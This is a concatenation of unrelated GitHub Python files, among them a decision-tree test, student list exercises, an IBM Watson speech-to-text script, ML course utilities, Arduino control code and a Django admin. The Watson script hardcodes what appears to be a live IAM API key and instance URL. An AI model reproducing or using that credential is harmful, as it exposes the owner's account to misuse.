Test tree\n test_data = CarData.Data()\n test_data.initialize_data_from_file(dir_path + '/../../Data/car/test.csv')\n\n # Detect Noise\n print(\"Begin detecting noise\")\n noise_count = 0\n for example in data.examples:\n for other_example in data.examples:\n if example == other_example:\n if example.label != other_example.label:\n noise_count += 1\n\n print(\"Detected \" + str(noise_count) + \" features of noise\\n\")\n\n # Begin prompts\n use_averages = input(\"Would you like to calculate averages over all metrics? y/n \")\n\n if use_averages == \"y\":\n calculate_averages(data, test_data, metrics, 7)\n\n else:\n tree_depth = int(input(\"Please enter desired tree depth [1 - 6] (0 to run entire tree):\"))\n if tree_depth == 0:\n tree_depth = float(\"inf\")\n\n metric_choice = int(input(\"Please enter a number for choice of metric:\\n0: Information Gain\\n\"\n \"1. Majority Error\\n2. Gini Index\\n\"))\n metric = metrics[metric_choice]\n\n # Run ID3\n height = run_id3(data, test_data, metric, tree_depth, None, None)\n print(\"Max height: \" + str(height))\n\n\ndef run_id3(data, test_data, metric, tree_depth, data_percents, train_data_percents):\n id3 = Id3.Id3(metric)\n print(\"\\n--- Using Tree level \" + str(tree_depth) + \" ---\")\n id3.fit(data.examples, data.attributes, None, data.labels, 0, tree_depth)\n\n correct_results = 0\n for example in test_data.examples:\n if example.get_label() == id3.predict(example):\n correct_results += 1\n\n percentage = float(correct_results) / float(len(test_data.examples))\n if data_percents is not None:\n data_percents.append(percentage)\n\n print(\"Test Error: \" + \"%.16f\" % (1.0 - percentage))\n\n correct_results = 0\n for example in data.examples:\n if example.get_label() == id3.predict(example):\n correct_results += 1\n\n percentage = float(correct_results) / float(len(data.examples))\n if train_data_percents is not None:\n train_data_percents.append(percentage)\n\n print(\"Training Error: \" + \"%.16f\" % (1.0 - percentage))\n max_height = id3.max_height\n id3.reset_max_height()\n\n return max_height\n\n\ndef calculate_averages(data, test_data, metrics, max_depth):\n information_gains = []\n information_gains_train = []\n max_errors = []\n max_errors_train = []\n ginis = []\n ginis_train = []\n values = [information_gains, max_errors, ginis]\n values_train = [information_gains_train, max_errors_train, ginis_train]\n metric_names = {0: \" Information Gain \", 1: \" Majority Error \", 2: \" Gini Index \"}\n\n max_j = 0\n for i in range(0, 3):\n print(\"\\n------------- \" + metric_names[i] + \" -------------\\n\")\n for j in range(1, max_depth):\n max_height = run_id3(data, test_data, metrics[i], j, values[i], values_train[i])\n if max_height < j:\n max_j = j\n break\n\n # Pop last value since it is a duplicate and we can no longer grow the tree\n if max_j != 0:\n values.pop()\n values_train.pop()\n\n # Calculate and print averages\n print(\"\\n-- Test data average for metrics --\")\n print(\"Information gain: \" + \"%.16f\" % (1.0 - average(values[0])))\n print(\"Majority Error: \" + \"%.16f\" % (1.0 - average(values[1])))\n print(\"Gini Index: \" + \"%.16f\" % (1.0 - average(values[2])))\n print(\"\\n-- Train data average for metrics --\")\n print(\"Information gain: \" + \"%.16f\" % (1.0 - average(values_train[0])))\n print(\"Majority Error: \" + \"%.16f\" % (1.0 - average(values_train[1])))\n print(\"Gini Index: \" + \"%.16f\" % (1.0 - average(values_train[2])))\n\n\ndef average(data):\n length = len(data)\n temp_sum = 0.0\n for element in data:\n temp_sum += element\n\n return temp_sum / float(length)\n","repo_name":"morsgiathatch/machine_learning","sub_path":"Tests/DecisionTreeTests/non_numeric_id3_test.py","file_name":"non_numeric_id3_test.py","file_ext":"py","file_size_in_byte":4254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72605131395","text":"def elemordonatecresc(list):\r\n sortedlist = list[:]\r\n sortedlist.sort()\r\n if sortedlist == list:\r\n return True\r\n return False\r\n\r\n\r\ndef readfloatlist() -> list[float]:\r\n list = []\r\n givenstring = input(\"Dati lista cu elemente separate prin virgula\")\r\n numbers_as_string = givenstring.split(\",\")\r\n for x in numbers_as_string:\r\n list.append(float(x))\r\n return list\r\n\r\ndef readintlist() -> list[int]:\r\n list = []\r\n givenstring = input(\"Dati lista cu elemente separate prin virgula\")\r\n numbers_as_string = givenstring.split(\",\")\r\n for x in numbers_as_string:\r\n list.append(int(x))\r\n\r\n return list\r\n\r\n\r\ndef get_longest_sorted_asc(lst: list[int]) -> list[int]:\r\n '''\r\n Determina cea mai lunga subsecventa de nr ordonate crescator\r\n :param lst: lista nr intregi\r\n :return: cea mai lunga subsecventa de nr ordonate crescator\r\n '''\r\n subsecventamax = []\r\n for i in range(len(lst)):\r\n for j in range(i, len(lst)):\r\n if elemordonatecresc(lst[i:j + 1]) and len(lst[i:j + 1]) > len(subsecventamax):\r\n subsecventamax = lst[i:j + 1]\r\n return subsecventamax\r\n\r\n\r\ndef listwithzero(l):\r\n for x in l:\r\n if x != 0:\r\n return False\r\n return True\r\n\r\n\r\ndef get_longest_equal_int_real(lst: list[float]) -> list[float]:\r\n '''\r\n Determina cea mai lunga subsecventa de numere cu popr. ca toate au partea fractionara = partea intreaga\r\n :param lst: lista cu numere reale\r\n :return: cea mai lunga subsecventa cu proprietatea ca toate numerele au pi = pf\r\n '''\r\n subsecventamax = []\r\n for i in range(len(lst)):\r\n for j in range(i, len(lst)):\r\n if listwithzero(lst[i:j + 1]) and len(lst[i:j + 1]) > len(subsecventamax):\r\n subsecventamax = lst[i:j + 1]\r\n return subsecventamax\r\n\r\n\r\ndef is_palindrome(n):\r\n '''\r\n Verifica daca un numar este palindrom\r\n :param n: numar intreg\r\n :return: Retruneaza adevarat daca nr este palindrom si False in caz contrar\r\n '''\r\n if n < 10:\r\n return False\r\n ogl = 0\r\n aux = n\r\n while aux > 0:\r\n ogl = ogl * 10 + aux % 10\r\n aux = aux // 10\r\n if ogl == n:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef palindromelist(l):\r\n for x in l:\r\n if is_palindrome(x) is False:\r\n return False\r\n return True\r\n\r\n\r\ndef get_longest_all_palindromes(lst: list[int]) -> list[int]:\r\n '''\r\n Determina cea mai lunga subsecventa de numere cu popr. ca toate nr sunt palindrom\r\n :param lst: lista cu numere reale\r\n :return: cea mai lunga subsecventa cu proprietatea ca toate numerele sunt palindrom\r\n '''\r\n subsecventamax = []\r\n for i in range(len(lst)):\r\n for j in range(i, len(lst)):\r\n if palindromelist(lst[i:j + 1]) and len(lst[i:j + 1]) > len(subsecventamax):\r\n subsecventamax = lst[i:j + 1]\r\n return subsecventamax\r\n\r\n\r\ndef test_get_longest_all_palindromes():\r\n assert get_longest_all_palindromes([]) == []\r\n assert get_longest_all_palindromes([12, 11, 22, 44, 54, 22]) == [11, 22, 44]\r\n assert get_longest_all_palindromes([12, 11, 22, 44, 54, 22, 66, 101, 202]) == [22, 66, 101, 202]\r\n\r\n\r\ndef test_elemordonatecresc():\r\n assert elemordonatecresc([]) is True\r\n assert elemordonatecresc([10, 4, 5]) is False\r\n assert elemordonatecresc([10, 20, 30]) is True\r\n\r\n\r\ndef test_get_longest_sorted_asc():\r\n assert get_longest_equal_int_real([]) == []\r\n assert get_longest_equal_int_real([1, 2, 0, 0]) == [0, 0]\r\n assert get_longest_equal_int_real([1, 2, 0, 0, 32, 0, 0, 0]) == [0, 0, 0]\r\n\r\n\r\ndef test_get_longest_equal_int_real():\r\n assert get_longest_equal_int_real([]) == []\r\n assert get_longest_equal_int_real([1, 2, 0, 0]) == [0.0, 0.0]\r\n assert get_longest_equal_int_real([1, 2, 0, 0 , 32, 0, 0, 0]) == [0.0, 0.0, 0.0]\r\n\r\n\r\ndef main():\r\n test_get_longest_sorted_asc()\r\n test_get_longest_equal_int_real()\r\n test_elemordonatecresc()\r\n print(\"\"\"\r\n 1, Determinati cea mai lunga subsecventa de numere ordonate crescator dintr un sir dat\r\n 2, Determinati cea mai lunga subsecventa cu proprietatea ca elementele au partea fractionara egala cu partea intreaga\r\n 3, Determinati cea mai lunga subsecventa cu proprietatea ca toate elem sunt palindrom\r\n x, Iesire\"\"\")\r\n while True:\r\n option = input(\"Selectati o funtie\")\r\n if option == \"1\":\r\n l = readintlist()\r\n print(get_longest_sorted_asc(l))\r\n elif option == \"2\":\r\n l = readfloatlist()\r\n print(get_longest_equal_int_real(l))\r\n elif option == '3':\r\n l = readintlist()\r\n print(get_longest_all_palindromes(l))\r\n elif option == \"x\":\r\n break\r\n else:\r\n print(\"Nu ati selectat o optiune valida!\")\r\n\r\n\r\nmain()\r\n","repo_name":"AP-MI-2021/lab-3-alexandrulupei","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71027222914","text":"#using ibm watson api\n#pip3 install --upgrade \"ibm-watson>=5.1.0\"\nfrom ibm_watson import SpeechToTextV1 \nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nimport json\nfrom os.path import join, dirname\n\n#authetication\nauthenticator = IAMAuthenticator('UhIENYMPXTuuukXYROghF8hYWFZSrC3z5HI2tm7iobsw')\nspeech_to_text = SpeechToTextV1(\n authenticator=authenticator\n)\nspeech_to_text.set_service_url('https://api.eu-gb.speech-to-text.watson.cloud.ibm.com/instances/9aa7928c-72da-423d-b870-e415fe6c6478')\n\nmodel = speech_to_text.get_model('en-US_NarrowbandModel').get_result()\nprint(json.dumps(model, indent=2))\n\ndef generateText():\n #downsampling the audio\n from pydub import AudioSegment as am #pip3 install pydub\n sound = am.from_file('./resources/sample_audio_2.wav', format='wav')\n sound = sound.set_frame_rate(16000)\n sound.export('./resources/sample_audio.wav', format='wav')\n\n with open(join(dirname(__file__), './resources/sample_audio_2.wav'),'rb') as audio_file:\n speech_recognition_results = speech_to_text.recognize(\n audio=audio_file,\n content_type='audio/wav',\n smart_formatting=True,\n continuous=True\n ).get_result()\n print(speech_recognition_results) #output as json \n\n #converting the output to string\n # {'results' [{-> 'alternatives' [{-> 'transcripts': ans}]}]}\n #we need to concatenate all the ans to get final result\n final_result = \"\"\n result_list = speech_recognition_results.get('results')\n\n for sent_dict in result_list:\n alt = sent_dict.get('alternatives')\n for trans_dict in alt:\n for transcript in trans_dict.get('transcript'):\n final_result = final_result + transcript\n final_result = final_result + \". \"\n\n #writing the converted to text file\n convertedText = open(\"generatedFile.txt\",\"a\")\n convertedText.write(final_result)\n convertedText.close()","repo_name":"manasi2905/Summary-of-Text","sub_path":"voiceToText.py","file_name":"voiceToText.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13437576476","text":"import pandas as pd\nimport numpy as np\nimport re\nfrom sklearn.model_selection import cross_val_score, cross_validate, train_test_split\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor, export_graphviz, plot_tree\n\nimport glob\n\n# visualization\nimport graphviz\nimport matplotlib.pyplot as plt\nfrom imageio import imread\n\nplt.rcParams[\"font.size\"] = 16\n\n# Custom function to customize the tree plot and hide values and samples\ndef custom_plot_tree(tree_model, feature_names=None, class_names=None, **kwargs):\n \"\"\"\n Customizes and displays a tree plot for a scikit-learn Decision Tree Classifier.\n\n Parameters:\n - tree (sklearn.tree.DecisionTreeClassifier): The trained Decision Tree Classifier to visualize.\n - width: width of the matplotlib plot in inches \n - height: height of the matplotlib plot in inches \n - feature_names (list or None): A list of feature names to label the tree nodes with feature names.\n If None, generic feature names will be used.\n - class_names (list or None): A list of class names to label the tree nodes with class names.\n If None, generic class names will be used.\n - **kwargs: Additional keyword arguments to be passed to the `sklearn.tree.plot_tree` function.\n\n Returns:\n - None: The function displays the customized tree plot using Matplotlib.\n \n This function customizes the appearance of a Decision Tree plot generated by the scikit-learn\n `plot_tree` function. It hides both the samples and values in each node of the tree plot\n for improved visualization.\n \"\"\" \n plot_tree(tree_model, \n feature_names=feature_names, \n class_names=class_names, \n filled=True, \n **kwargs)\n \n # Customize the appearance of the text elements for each node\n for text in plt.gca().texts:\n new_text = re.sub('samples = \\d+\\n', '', text.get_text()) # Hide samples\n text.set_text(new_text) \n \n plt.show()\n\ndef cross_validate_std(*args, **kwargs):\n \"\"\"Like cross_validate, except also gives the standard deviation of the score\"\"\"\n res = pd.DataFrame(cross_validate(*args, **kwargs))\n res_mean = res.mean()\n\n res_mean[\"std_test_score\"] = res[\"test_score\"].std()\n if \"train_score\" in res:\n res_mean[\"std_train_score\"] = res[\"train_score\"].std()\n return res_mean\n\ndef mean_std_cross_val_scores(model, X_train, y_train, **kwargs):\n \"\"\"\n Returns mean and std of cross validation\n\n Parameters\n ----------\n model :\n scikit-learn model\n X_train : numpy array or pandas DataFrame\n X in the training data\n y_train :\n y in the training data\n\n Returns\n ----------\n pandas Series with mean scores from cross_validation\n \"\"\"\n\n scores = cross_validate(model, X_train, y_train, **kwargs)\n\n mean_scores = pd.DataFrame(scores).mean()\n std_scores = pd.DataFrame(scores).std()\n out_col = []\n\n for i in range(len(mean_scores)):\n out_col.append((f\"%0.3f (+/- %0.3f)\" % (mean_scores.iloc[i], std_scores.iloc[i])))\n\n return pd.Series(data=out_col, index=mean_scores.index)","repo_name":"UBC-CS/cpsc330-2023W1","sub_path":"lectures/code/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"28144252957","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nCount the number of prime numbers less than a non-negative number, n.\n\nExample:\n\nInput: 10\nOutput: 4\nExplanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\n\"\"\"\nfrom math import sqrt, floor\n\n\nclass Solution:\n def isPrimes(self, n: int) -> bool:\n for i in range(2, floor(sqrt(n)) + 1):\n if not n % i:\n return False\n return True\n\n def countPrimes(self, n: int) -> int:\n result = 0\n primes = [True] * n\n\n for i in range(2, n):\n if primes[i]:\n result += 1\n j = 2\n while i * j < n:\n primes[i * j] = False\n j += 1\n return result\n\n\nif __name__ == '__main__':\n a = Solution()\n print(a.countPrimes(2))\n print(a.countPrimes(10))\n print(a.countPrimes(999983))\n","repo_name":"heianhu/DataStructuresAndAlgorithm","sub_path":"算法/Leetcode/Easy/8.Math/2.Count Primes.py","file_name":"2.Count Primes.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"29547128309","text":"\"\"\"\nCreated on Thu May 4 15:25:34 2022\n\nTo filter structure information based\non different models\n\n0 : weir\n1 : culvert\n2 : pump\n3 : control structures\n\n*change end section indication part manually\n\n@author: Michael Getachew Tadesse\n\n\"\"\"\n\nimport os \nimport logging\nimport pandas as pd\n\n# select structure type\n\nstr_type = \"ctrl_stru\"\n\nstruct = {\"weirs\" : \"0\",\n \"culverts\" : \"1\",\n \"pumps\" : \"2\",\n \"ctrl_stru\" : \"3\"\n }\n\n\n# define model file locations \nweirs = \"D:\\\\Hazen and Sawyer\\\\MIKE_Modeling_Group - Documents\\\\BCB\\\\data\\\\weirs\"\nculverts = \"D:\\\\Hazen and Sawyer\\\\MIKE_Modeling_Group - Documents\\\\BCB\\\\data\\\\culverts\"\npumps = \"\"\nbridges = \"\"\nctrl_stru = \"D:\\\\Hazen and Sawyer\\\\MIKE_Modeling_Group - Documents\\\\BCB\\\\data\\\\ctrl_stru\"\n\n\n# read list of filtered out struture names\ndat = pd.read_csv(\"structures.csv\")\n# dat = pd.read_csv(\"test_structures.csv\")\n\n\n\n\nprint(int(struct[str_type])/1.0)\ndat = dat[dat['Str_Type'] == int(struct[str_type])/1.0]\ndat.reset_index(inplace = True)\nprint(dat)\n\n\n# define model file names\nmodelName = {\n \"BCB_C1\" : \"bcb.txt\",\n \"CCWHP\" : \"cc.txt\",\n \"SLWCI\" : \"slcwi.txt\"\n}\n\n##############################################\n# change the saving file name\n##############################################\n\n# start logging\nlogging.basicConfig(filename= str_type + \".log\", encoding='utf-8', level=logging.DEBUG)\n\nwith open(\"bcbUpdated\" + str_type + \".txt\", \"w\") as f:\n\n # select structure type\n os.chdir(str_type)\n \n for ii in range(len(dat)):\n id = dat['Str_ID'][ii]\n branch = dat['Str_BrName'][ii]\n # chainage = dat['Str_Ch'][ii].astype(str).split(\".0\")[0]\n chainage = dat['Str_Ch'][ii]\n model = dat['Model'][ii]\n \n \n # print(\"Location = {}, {}, {}\".format(id, chainage, model))\n \n infile = open(modelName[model], 'r').readlines()\n\n prev_line = \"\"\n copyLines = False\n \n for line in infile:\n # print(line)\n\n # just for control structures - following selection\n if (\"Location = '{}', {}, '{}'\".format(branch, chainage, id) in line) | \\\n (\"Location = '{}', {}, '{}'\"\n .format(branch, chainage.astype(str).split(\".0\")[0], id) in line): \n # print(line)\n f.write(prev_line)\n # f.write(\"\\n\")\n copyLines = True\n \n logging.info(id)\n \n if copyLines:\n ######################################\n # change end line string\n ######################################\n if \"EndSect // control_str_data\" in line:\n f.write(line)\n # f.write(\"\\n\")\n break\n else: \n f.write(line)\n # f.write(\"\\n\")\n \n \n prev_line = line\n ","repo_name":"moinabyssinia/glrsta","sub_path":"others/structureFilter.py","file_name":"structureFilter.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70424153474","text":"import sys\nimport os\nimport select\n\nfrom artiq.experiment import *\nfrom artiq.coredevice.fmcdio_vhdci_eem import *\n\n\ndef chunker(seq, size):\n res = []\n for el in seq:\n res.append(el)\n if len(res) == size:\n yield res\n res = []\n if res:\n yield res\n\n\ndef is_enter_pressed() -> TBool:\n if os.name == \"nt\":\n if msvcrt.kbhit() and msvcrt.getch() == b\"\\r\":\n return True\n else:\n return False\n else:\n if select.select([sys.stdin, ], [], [], 0.0)[0]:\n sys.stdin.read(1)\n return True\n else:\n return False\n\n\nclass Demo(EnvExperiment):\n def build(self):\n self.setattr_device(\"core\")\n self.setattr_device(\"fmcdio_dirctl\")\n\n self.leds = dict()\n self.ttl_outs = dict()\n\n ddb = self.get_device_db()\n for name, desc in ddb.items():\n if isinstance(desc, dict) and desc[\"type\"] == \"local\":\n module, cls = desc[\"module\"], desc[\"class\"]\n if (module, cls) == (\"artiq.coredevice.ttl\", \"TTLOut\"):\n dev = self.get_device(name)\n if \"led\" in name: # guess\n self.leds[name] = dev\n elif \"ttl\" in name: # to exclude fmcdio_dirctl\n self.ttl_outs[name] = dev\n\n self.leds = sorted(self.leds.items(), key=lambda x: x[1].channel)\n self.ttl_outs = sorted(self.ttl_outs.items(), key=lambda x: x[1].channel)\n\n self.dirctl_word = (\n shiftreg_bits(0, dio_bank0_out_pins | dio_bank1_out_pins) |\n shiftreg_bits(1, dio_bank0_out_pins | dio_bank1_out_pins)\n )\n\n @kernel\n def init(self):\n self.core.break_realtime()\n print(\"*** Waiting for DRTIO ready...\")\n drtio_indices = [7]\n for i in drtio_indices:\n while not self.drtio_is_up(i):\n pass\n\n self.fmcdio_dirctl.set(self.dirctl_word)\n\n @kernel\n def drtio_is_up(self, drtio_index):\n if not self.core.get_rtio_destination_status(drtio_index):\n return False\n print(\"DRTIO #\", drtio_index, \"is ready\\n\")\n return True\n\n @kernel\n def test_led(self, led):\n while not is_enter_pressed():\n self.core.break_realtime()\n # do not fill the FIFOs too much to avoid long response times\n t = now_mu() - self.core.seconds_to_mu(0.2)\n while self.core.get_rtio_counter_mu() < t:\n pass\n for i in range(3):\n led.pulse(100*ms)\n delay(100*ms)\n\n def test_leds(self):\n print(\"*** Testing LEDs.\")\n print(\"Check for blinking. Press ENTER when done.\")\n\n for led_name, led_dev in self.leds:\n print(\"Testing LED: {}\".format(led_name))\n self.test_led(led_dev)\n\n @kernel\n def test_ttl_out_chunk(self, ttl_chunk):\n while not is_enter_pressed():\n self.core.break_realtime()\n for _ in range(50000):\n i = 0\n for ttl in ttl_chunk:\n i += 1\n for _ in range(i):\n ttl.pulse(1*us)\n delay(1*us)\n delay(10*us)\n\n def test_ttl_outs(self):\n print(\"*** Testing TTL outputs.\")\n print(\"Outputs are tested in groups of 4. Touch each TTL connector\")\n print(\"with the oscilloscope probe tip, and check that the number of\")\n print(\"pulses corresponds to its number in the group.\")\n print(\"Press ENTER when done.\")\n\n for ttl_chunk in chunker(self.ttl_outs, 4):\n print(\"Testing TTL outputs: {}.\".format(\", \".join(name for name, dev in ttl_chunk)))\n self.test_ttl_out_chunk([dev for name, dev in ttl_chunk])\n\n def run(self):\n self.core.reset()\n\n if self.leds:\n self.test_leds()\n if self.ttl_outs:\n self.test_ttl_outs()\n","repo_name":"hemmerlinglab/Electrons_Artiq_Sequences","sub_path":"artiq-master/examples/metlino_sayma_ttl/repository/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70499625794","text":"from pyfirmata import Arduino, util\nfrom time import sleep\nimport math\n\ndef blink(board, pin, time):\n board.digital[pin].write(1)\n sleep(time)\n board.digital[pin].write(0)\n sleep(time)\n\n# configuracion de la tarjeta\nPORT = '/tmp/ttyS1'\nboard = Arduino(PORT)\nprint('Conexion lista')\n\nutil.Iterator(board).start()\n\n# configuro la salida del PWM para el ventilador\nMOTOR_PIN = 3\nmotor = board.get_pin(f'd:{str(MOTOR_PIN)}:p')\n\n# configuro salida del LED\nLED_PIN = 8\nled = board.get_pin(f'd:{str(LED_PIN)}:o')\n\n# configuracion SENSOR\nSENSOR_CURRENT_PIN = 0\ncurrent_sensor = board.get_pin(f'a:{str(SENSOR_CURRENT_PIN)}:i')\nsleep(1)\n\n\nwhile True:\n\n value = current_sensor.read()\n\n if value == None:\n continue\n\n celsius = value * 500\n celsius = math.ceil(celsius)\n\n if celsius <= 50:\n blink(board=board, pin=LED_PIN,time=1)\n motor.write(0.00)\n elif celsius > 50 and celsius <= 100:\n motor.write(0.33)\n led.write(1)\n elif celsius > 100 and celsius <= 150:\n motor.write(0.6)\n led.write(1)\n elif celsius > 150:\n motor.write(0.999)\n blink(board=board,pin=LED_PIN,time=0.2)\n\n print(f'temperatura {celsius}')\n\n","repo_name":"jalmx/micro-21","sub_path":"book/cap3/practices/temp_ventilador.py","file_name":"temp_ventilador.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12637277272","text":"class TaiFormula:\n def __init__(self):\n self._read_inputs()\n self._calculate_area()\n\n\n def _read_inputs(self):\n \"\"\"Obtain inputs\"\"\"\n self.data = list()\n for _ in range(int(input())):\n self.data.append(list(map(float, input().rstrip().split())))\n return self\n\n def _calculate_area(self):\n \"Loop over all trapezoids\"\n area = 0\n for idx in range(1, len(self.data)):\n glucose_change = (self.data[idx][1] + self.data[idx - 1][1])/2\n time_change = (self.data[idx][0] - self.data[idx - 1][0]) / 1000\n trapezoid_area = glucose_change * time_change\n area += trapezoid_area\n print(area)\n\n\nif __name__ == \"__main__\":\n TaiFormula()","repo_name":"sergeiissaev/Kattis-solutions","sub_path":"taisformula.py","file_name":"taisformula.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39512254827","text":"# try and catch is used to handle exceptions\n\n# Excercises\n# index error\ntry:\n items = [1,2,3,4,5]\n item = items[2]\n print(item)\nexcept IndexError as e:\n print(e)\nelse:\n print(\"I only run if there is no exception\")\nfinally:\n print(\"I run no matter what\")\n \n \n#ZeroDivisionError\ndef divide_by(a,b):\n return a/b\n\ntry:\n ans = divide_by(50,0)\nexcept ZeroDivisionError as e: #specific exception\n print(e, \"we cannot divide by zero\")\nexcept Exception as e: #general exception\n print(e, \"Catches them all\")\n \n#FileNotFoundError\ntry:\n with open('file_does_not_exist.txt', 'r') as file:\n print(file.read())\nexcept:\n print(\"Unable to locate file\") \n \n# Checkout more about exceptions in the documentation of python https://realpython.com/python-exceptions/","repo_name":"gagan77/Python-Basics","sub_path":"Python-Basics/python_exceptions.py","file_name":"python_exceptions.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38479200736","text":"# Name: genSchemaCSV.py\n# Author: Rich Rose\n# Description: Create a fake csv based on a JSON schema\n# Lab: GSP291\n\nfrom random import randint\nfrom faker import Faker\nimport json\nimport sys\nimport argparse\n\nfake = Faker()\n\n# Name: getDatabaseSchema\n# Description: Open the schema\n\ndef getDatabaseSchema(filename, schema_dict):\n with open(filename, 'r') as file:\n schema_dict = json.load(file)\n \n return schema_dict\n\n\n# Name: getDataField\n# Description: Create fake data\n\ndef getDataField(index):\n switcher={\n # Generate a fake string length 5 to 20 characters\n 1: fake.pystr(min_chars=None, max_chars=randint(5,20)),\n # Generate a fake float length 5 with 2 decimal places\n 2: fake.pyfloat(left_digits=5, right_digits=2, positive=False),\n # Generate a custom type - add your own definition :-)\n 3: 'Custom TYPE'\n }\n \n return switcher.get(index, \"Invalid index - update buildHeaderField\")\n\n\n# Name: setDataRow\n# Description: Add some fake data based on the schema type\n\ndef setDataRow(schema_dict, csvRow):\n\n index = 0\n bound = len(schema_dict)-1\n customField = \"\"\n\n for schema in schema_dict:\n if index < bound:\n if schema['type'] == \"STRING\":\n customField = getDataField(1)\n elif schema['type'] == \"FLOAT\":\n customField = getDataField(2)\n\n csvRow = csvRow + str(customField) + \",\"\n index = index + 1\n else:\n if schema['type'] == \"STRING\":\n customField = getDataField(1)\n elif schema['type'] == \"FLOAT\":\n customField = getDataField(2)\n csvRow = csvRow + str(customField) + \"\\n\"\n\n return csvRow\n\n\n# Name: setHeaderRow\n# Description: Use the schema to create a header row\n\ndef setHeaderRow(schema_dict, csvHeader):\n\n index = 0\n bound = len(schema_dict)-1\n\n for schema in schema_dict:\n if index < bound:\n csvHeader = csvHeader + schema['name'] + \",\"\n index = index + 1\n else:\n csvHeader = csvHeader + schema['name'] + \"\\n\"\n\n return csvHeader\n\n\n# Name: getCustomCSV\n# Description: Take the schema and output psuedo csv data\n\ndef getCustomCSV(schema_dict, numRows):\n csvHeader = \"\"\n csvRow = \"\"\n index = 0\n \n # Open file\n with open('test.csv', 'w') as csv_file:\n # Generate header for the file\n csvHeader = setHeaderRow(schema_dict, csvHeader)\n # print (csvHeader)\n csv_file.write(csvHeader)\n\n for index in range(int(numRows)):\n # Generate N rows for the file\n csvRow = setDataRow(schema_dict, csvRow)\n # print (csvRow)\n csv_file.write(csvRow)\n\n\n# Name: getArguments\n# Description: Process command line arguments\n\ndef getArguments():\n\n filename = \"\"\n numRows = 0\n\n # Consume schema\n parser=argparse.ArgumentParser(description='Schema command line executer')\n parser.add_argument('--schema', help='Add value1')\n parser.add_argument('--numRows',help='Add value2')\n\n args=parser.parse_args()\n\n # Ensure two arguments are supplied\n if (len(sys.argv) < 2):\n parser.print_help()\n else:\n # Map filename + numRow\n filename = args.schema\n numRows = args.numRows\n\n # Return value\n return filename, int(numRows)\n\n\n# Process the Dataschema and build a CSV\n# Usage: app --schema file.json --numRows 10\n\nif __name__ == '__main__':\n schema_dict = []\n filename = \"\"\n numRows = 0\n\n # Validate arguments\n filename, numRows=getArguments()\n\n # Only process information if data is required\n if numRows > 0:\n # Read in the JSON schema\n schema_dict = getDatabaseSchema(filename, schema_dict)\n\n # Build a CSV based on the schema\n getCustomCSV(schema_dict, numRows)\n","repo_name":"rosera/gcp-dataflow-tools","sub_path":"genSchemaCSV.py","file_name":"genSchemaCSV.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9075892059","text":"from django.contrib import admin\nfrom .models import District, Property, PropertyImages,Wishlist,Comment\n\n# Register your models here.\n\nclass PropertyImagesInline(admin.StackedInline):\n model = PropertyImages\n\nclass PropertyAdmin(admin.ModelAdmin):\n model = Property\n inlines = [PropertyImagesInline,]\n\n list_display = ('title', 'plot_area', 'rate', 'zip_code', 'owner', 'is_occupied')\n\n fieldsets = (\n (None, { 'fields': ('title', 'description', 'owner', 'is_occupied', ) }),\n ('Address', { 'fields': ('address_1', 'city', 'district', 'zip_code','location',) }),\n ('Other Info', { 'fields': ('no_of_floors', 'plot_area', 'rate', 'has_watersupply', 'has_electricity',\n 'no_of_bathrooms_inside','no_of_bathrooms_outside','no_of_bedrooms','master_bedroon','no_of_livingrooms','kitchen','dining_hall','feature_1','feature_2',) }),\n #('Property Images',{ 'fields': ('Image',)}),\n )\n\n search_fields = ('title', 'zip_code', 'city','district', 'description')\n\nadmin.site.register(Property, PropertyAdmin)\nadmin.site.register(PropertyImages)\nadmin.site.register(District)\nadmin.site.register(Comment)\nadmin.site.register(Wishlist)\n\n","repo_name":"akhilaanand26/Project-Code","sub_path":"findahome/properties/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10620304574","text":"class Solution:\n def addStrings(self, num1: str, num2: str) -> str:\n s1, s2 = len(num1) - 1, len(num2) - 1\n ans, cb = \"\", 0\n while s1 >= 0 or s2 >= 0:\n n1 = int(num1[s1]) if s1 >= 0 else 0\n n2 = int(num2[s2]) if s2 >= 0 else 0\n d = n1 + n2 + cb\n cb = d // 10\n d %= 10\n ans += str(d)\n s1, s2 = s1 - 1, s2 - 1\n if cb != 0:\n ans += str(cb)\n return ans[::-1]","repo_name":"Dawinia/LeetCode","sub_path":"String/415. 字符串相加.py","file_name":"415. 字符串相加.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10201966536","text":"HASHING_WRONG_SIZE 